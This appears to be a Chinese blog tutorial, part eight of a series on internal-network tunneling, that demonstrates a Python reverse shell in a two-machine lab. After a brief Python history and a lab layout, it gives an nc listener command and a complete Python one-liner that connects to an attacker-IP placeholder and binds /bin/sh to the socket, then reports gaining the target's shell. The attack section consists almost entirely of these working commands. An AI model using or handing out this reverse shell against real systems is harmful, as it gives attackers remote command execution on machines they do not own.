内网隧道代理技术(八)之Python 反弹Shell

Python 反弹Shell

Python介绍

Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,作为一门叫做ABC语言的替代品。Python提供了高效的高级数据结构,还能简单有效地面向对象编程。Python语法和动态类型,以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用的编程语言,随着版本的不断更新和语言新功能的添加,逐渐被用于独立的、大型项目的开发

实验环境介绍

实验拓扑

在这里插入图片描述

机器名称IP机器
攻击机器192.168.41.130windows
服务器192.168.41.132kali

实验复现

攻击机器使用nc执行监听命令

#监听TCP
nc64.exe -lvvp 1111

在这里插入图片描述

实验服务器执行连接命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

查看结果,发现我们成功得到了目标服务的shell

在这里插入图片描述

posted @ 2023-06-25 21:06  私ははいしゃ敗者です  阅读(60)  评论(0编辑  收藏  举报  来源